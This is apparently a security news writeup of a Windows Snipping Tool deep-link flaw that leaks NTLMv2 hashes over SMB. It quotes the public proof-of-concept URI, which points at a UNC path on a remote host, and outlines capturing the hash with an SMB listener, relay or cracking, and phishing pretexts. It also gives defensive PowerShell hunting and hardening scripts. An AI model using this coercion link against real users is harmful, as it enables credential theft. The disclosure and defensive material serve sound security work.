- A single click on a crafted ms-screensketch:// link is enough to leak your Windows NTLMv2 hash.
- BlackArrowSec just published the PoC.
- Here is how CVE-2026-33829 works and what to patch.
TL;DR
CVE-2026-33829 is a spoofing flaw in the Windows Snipping Tool that leaks a user's NTLMv2 hash over the network. The app's ms-screensketch deep link fails to validate the filePath parameter, so a crafted URI forces an outbound SMB connection, with NTLM authentication, to an attacker-controlled server. CVSS 3.1 = 4.3 (Moderate), but the impact on enterprise networks is real: the captured NTLMv2 response can be relayed to internal services that do not enforce signing or EPA, or cracked offline. Microsoft shipped fixes on April 14, 2026; BlackArrowSec published the PoC on April 15, 2026. There is no app-level workaround: patch now.
What's new
Researcher Margaruga from the BlackArrowSec Red Team coordinated disclosure with Microsoft on March 23, 2026. The public advisory and patches landed with Patch Tuesday on April 14, 2026, and the full technical writeup plus proof-of-concept went live on the BlackArrowSec GitHub repository the next day. SecurityOnline and HTMD Blog followed with mainstream coverage.
The Snipping Tool's app manifest registers the ms-screensketch protocol through a uap:Protocol extension, which is what lets any browser or app that can open a URI hand arguments to the tool. The flaw is that the filePath argument arriving through that handler is used as-is, UNC paths included, so a web page can point Snipping Tool at an attacker's SMB share and the user never intended any of it.
Why it matters
What leaks is the Net-NTLMv2 challenge-response, not the NT hash itself, so it cannot be used for pass-the-hash. It can, however, be relayed in real time (NTLM relay) to SMB, LDAP or HTTP endpoints that do not enforce signing or Extended Protection for Authentication (EPA), letting the attacker authenticate as the victim to those servers. Offline cracking of the response against the user's password is the fallback when relay is not possible.
The social-engineering angle is the part that makes this ugly. Snipping Tool actually opens on the victim's screen, so the pretext — "crop this corporate wallpaper", "edit your badge photo" — looks legitimate. The NTLM authentication happens invisibly in the background while the user is busy cropping an image.
Technical facts
- CVE: CVE-2026-33829
- CVSS 3.1 base: 4.3 (Moderate); temporal 3.8
- CWE: CWE-200 — Exposure of Sensitive Information
- Attack vector: Network, Low complexity, no privileges, user interaction required
- Impact: Confidentiality only — no integrity or availability loss
- Discoverer: Margaruga, BlackArrowSec Red Team
- Affected: 31 platform variants — Windows 10 (1607, 1809, 21H2, 22H2), Windows 11 (21H2 through 26H1), Windows Server 2012 through 2025
- Exploit code maturity: rated Unproven in Microsoft's advisory at release, one day before the public PoC; no in-the-wild exploitation reported
The published proof-of-concept URI is a single line:
ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast

Stand up an SMB listener (Responder, impacket-smbserver, or similar), open the URL in a browser, accept the "Open Snipping Tool?" prompt, and the hash lands in the attacker's log.
Attack chain
- Attacker runs an SMB listener on a reachable host (snip.attacker.tld).
- Crafts an ms-screensketch:edit link with filePath pointing to that UNC path.
- Delivers the link via phishing email, compromised site, or a redirector whose URL looks like a plain image (https://snip.example.com/wallpaper/image.png) but serves HTML that auto-navigates to the deep link.
- Victim clicks; browser asks to launch Snipping Tool; user confirms.
- Snipping Tool opens and silently fetches the file over SMB; Windows performs NTLMv2 authentication against the attacker's server.
- Attacker captures the NTLMv2 response — offline crack or live relay.
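The chain above leaves one reliable artifact on the endpoint: SnippingTool.exe is launched with the full ms-screensketch: URI on its command line. The following hunting script is an added example, not BlackArrowSec's PoC or Microsoft's code. It extracts the filePath argument from such URIs and flags any that resolve to a UNC target, the primitive this bug abuses. The server names, the trusted-server allowlist and the sample command lines are constructed; in production, feed it the CommandLine field of Sysmon Event ID 1 or Security 4688 events via Get-WinEvent.

```powershell
# Added hunting example for CVE-2026-33829; not BlackArrowSec's PoC nor
# Microsoft's code. Pulls the filePath argument out of ms-screensketch: URIs
# as they appear in process-creation telemetry and flags UNC targets. Host
# names, the allowlist and the sample command lines below are constructed.

function Get-ScreenSketchFilePath {
    param([Parameter(Mandatory)][string]$Uri)
    # PoC shape: ms-screensketch:edit?&filePath=...&isTemporary=...; keep only
    # the query string and walk its key=value pairs (the leading '&' produces
    # an empty pair, which simply never matches).
    $query = ($Uri -split '\?', 2)[1]
    if (-not $query) { return $null }
    foreach ($pair in ($query -split '&')) {
        if ($pair -match '^filePath=(.+)$') {
            # Browsers percent-encode backslashes, so %5C%5C must be decoded
            # before the UNC test.
            return [uri]::UnescapeDataString($Matches[1])
        }
    }
    return $null
}

function Test-ScreenSketchUri {
    param(
        [Parameter(Mandatory)][string]$Uri,
        [string[]]$TrustedServers = @()   # assumption: your own file servers
    )
    $path = Get-ScreenSketchFilePath -Uri $Uri
    if (-not $path) { return $null }

    # UNC forms that trigger a network lookup: \\host\share\f, //host/share/f
    # and the long form \\?\UNC\host\share\f. Drive-letter paths stay local.
    if ($path -match '^(?:\\\\|//)(?:\?\\UNC\\)?([^\\/]+)[\\/]') {
        $server  = $Matches[1]
        $verdict = if ($TrustedServers -contains $server) { 'unc-trusted' } else { 'SUSPECT: remote UNC, possible NTLM coercion' }
    } else {
        $server  = $null
        $verdict = 'local'
    }
    [pscustomobject]@{ Uri = $Uri; FilePath = $path; Server = $server; Verdict = $verdict }
}

# Constructed command lines in the shape of Sysmon Event ID 1 / Security 4688
# CommandLine fields; not real telemetry.
$samples = @(
    'SnippingTool.exe "ms-screensketch:edit?&filePath=\\snip.blackarrow.lab\file.png&isTemporary=false&saved=true&source=Toast"',
    'SnippingTool.exe "ms-screensketch:edit?&filePath=%5C%5Cfiles.corp.example%5Cpublic%5Cbadge.png&isTemporary=false"',
    'SnippingTool.exe "ms-screensketch:edit?&filePath=C:\Users\alice\Pictures\Screenshots\cap.png&isTemporary=true"'
)

foreach ($line in $samples) {
    if ($line -match '(ms-screensketch:[^"\s]+)') {
        Test-ScreenSketchUri -Uri $Matches[1] -TrustedServers @('files.corp.example')
    }
}
```

The first sample is flagged (snip.blackarrow.lab is not on the allowlist), the second is a UNC path to a trusted server, and the third is a local file. The same parse-then-reject logic is what the protocol handler should have applied before touching the path: a deep link has no business carrying a UNC path at all, and a proxy or mail gateway rule that drops ms-screensketch: URIs whose filePath starts with \\ or %5C%5C catches the PoC as published.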
Real-world scenarios
The bug is a gift for red teamers and phishing-led intrusions. Expected pretexts:
- "Update your corporate wallpaper before the all-hands" — hosted on an internal-looking domain
- "Crop your new badge photo for the HR portal"
- "Review and annotate this draft diagram" embedded in a Teams or email message
Standalone home users are not safe either — their hash is still usable for offline cracking, and the Snipping Tool ships enabled by default on Windows 10 and 11.
Limitations & mitigation
User interaction is required: the victim must click and confirm the app-launch prompt. That is a weak barrier in phishing-heavy environments. The flaw does not yield code execution or system compromise on its own — only the hash.
Microsoft states there is no application-level workaround. Patching is mandatory:
- Install April 2026 Windows Security Updates — including KB5082200 (Win10 22H2), KB5083769 (Win11 24H2/25H2), and the matching KBs for Windows 11 23H2, Windows 10 1607/1809, and Windows Server 2016/2019/2022/2025
- Block outbound SMB (TCP/445) at the perimeter to stop NTLM hashes from reaching the internet
- Enforce SMB signing and Extended Protection for Authentication on internal services to defeat relay
- Disable NTLM where you can: prefer Kerberos, set the LAN Manager authentication level so only NTLMv2 is ever sent, and use the Restrict NTLM policies to audit and then block outgoing NTLM to remote servers
- Train users: any "Open app?" prompt triggered by a webpage deserves a second look
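The patch check and the network-side items in the list above, applied to a single workstation, as an added example that is not Microsoft's or BlackArrowSec's script. Run it elevated. The KB numbers are the ones quoted above; the build-to-KB map, the allowlisted server name and the choice of audit mode for NTLM are assumptions to adjust for your own estate.

```powershell
# Added hardening example for CVE-2026-33829; not Microsoft's or BlackArrowSec's
# script. Run elevated on a workstation. KB numbers are those quoted in the
# article; the build-to-KB map and server names are assumptions.

# 1. Is the April 2026 cumulative update present?
$RequiredKb = @{
    '19045' = 'KB5082200'   # Windows 10 22H2
    '26100' = 'KB5083769'   # Windows 11 24H2
    '26200' = 'KB5083769'   # Windows 11 25H2 (same servicing package as 24H2)
}
$build = (Get-CimInstance Win32_OperatingSystem).BuildNumber
$kb = $RequiredKb[$build]
if ($kb) {
    # Get-HotFix reads Win32_QuickFixEngineering; a later LCU that supersedes
    # $kb appears under its own number, so treat "missing" as "verify".
    $installed = [bool](Get-HotFix -Id $kb -ErrorAction SilentlyContinue)
    Write-Output "Build $build requires $kb : installed=$installed"
} else {
    Write-Output "Build $build is not in the map; look up its April 2026 KB manually"
}

# 2. Stop NTLM responses leaving the network: block outbound SMB to non-local
#    addresses. 'Internet' is the built-in address keyword for non-private ranges.
if (-not (Get-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' -ErrorAction SilentlyContinue)) {
    New-NetFirewallRule -DisplayName 'Block outbound SMB to Internet' -Direction Outbound `
        -Protocol TCP -RemotePort 445 -RemoteAddress Internet -Action Block -Profile Any | Out-Null
}

# 3. Defeat relay of anything captured internally: require SMB signing on both
#    sides of this host. (EPA and LDAP channel binding are server-side settings
#    that belong on the domain controllers and web servers, not here.)
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force

# 4. Restrict outgoing NTLM. Start in audit (1) and review Event ID 8001 in
#    Microsoft-Windows-NTLM/Operational before moving to deny (2); servers that
#    still legitimately need NTLM go in ClientAllowedNTLMServers.
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0'
Set-ItemProperty -Path $lsa -Name RestrictSendingNTLMTraffic -Value 1 -Type DWord
Set-ItemProperty -Path $lsa -Name ClientAllowedNTLMServers -Value @('files.corp.example') -Type MultiString  # assumption

# 5. Refuse LM and NTLMv1 outright so only NTLMv2 is ever offered.
Set-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa' -Name LmCompatibilityLevel -Value 5 -Type DWord
```

Two caveats. The firewall rule covers SMB only: if the WebClient service is running, a UNC lookup that fails on 445 can fall back to WebDAV over 80/443, which this rule does not touch, so disable WebClient where it is not needed. And on Windows 11 24H2 and Server 2025 the SMB client can refuse NTLM entirely (Set-SmbClientConfiguration -BlockNTLM $true), which is a cleaner answer than the registry policy for hosts that no longer need NTLM at all.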
What's next
Expect derivative tooling fast. Public PoC + Responder is the minimum-viable kit for a red team to weaponize this. NTLM coercion through an attacker-controlled UNC path is a recurring Windows bug class, and Snipping Tool itself has prior history (CVE-2023-28303, Acropalypse, though that was an information leak in cropped images rather than a coercion bug). Watch for researchers auditing other built-in apps that register custom URI schemes: the manifest pattern that broke here is not unique to Snipping Tool.
If you run Windows estates: push the April 2026 updates through WSUS / Intune today, audit your SMB egress rules, and assume any unpatched host that clicked a suspicious link over the last week has already coughed up a hash.
Sources: BlackArrowSec advisory, SecurityOnline, Cybersecurity News, HTMD Blog.
